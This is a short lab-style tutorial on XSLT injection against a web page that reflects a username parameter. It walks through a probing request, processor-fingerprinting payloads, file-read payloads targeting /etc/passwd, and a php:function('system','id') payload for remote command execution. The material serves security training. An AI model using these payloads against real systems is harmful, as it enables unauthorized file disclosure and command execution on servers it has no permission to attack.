Identify
Web app displays basic information about some academy modules. At the bottom of the page, we can provide a username that is inserted into the headline at the top of the list (
Hi Peter, here are your favorite modules:).
Fact that the name we provided is reflected on the page is suspicious.
Let’s suppose the web app stores the module information in an XML document and displays the data using XSLT processing.
To confirm this, we will try to inject a broken XML tag (<) and provoke an error in the web app:
GET /index.php?name=< HTTP/1.1
Above request provoked 500 Internal Server Error, which might indicate the presence of a security issue.
Information Disclosure
We can try to infer some basic information about the XSLT processor in use by injecting the following XSLT elements:
Version: <xsl:value-of select="system-property('xsl:version')" />
<br/>
Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
<br/>
Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
<br/>
Product Name: <xsl:value-of select="system-property('xsl:product-name')" />
<br/>
Product Version: <xsl:value-of select="system-property('xsl:product-version')" />LFI
We can try multiple different functions to read a local file. Payload will work depending on the XSLT version and the configuration of the XSLT library.
For instance, XSLT 2.0 contains a function unparsed-text that can be used to read a local file:
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />For XSLT 1.0, above will not work. We can instead see if the XSLT library is configured to support PHP functions, and PHP function file_get_contents using the following XSLT element:
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />RCE
If an XSLT processor supports PHP functions, we can call a PHP function that executes a local system command to obtain RCE. For instance, we can call the PHP function system to execute a command:
<xsl:value-of select="php:function('system','id')" />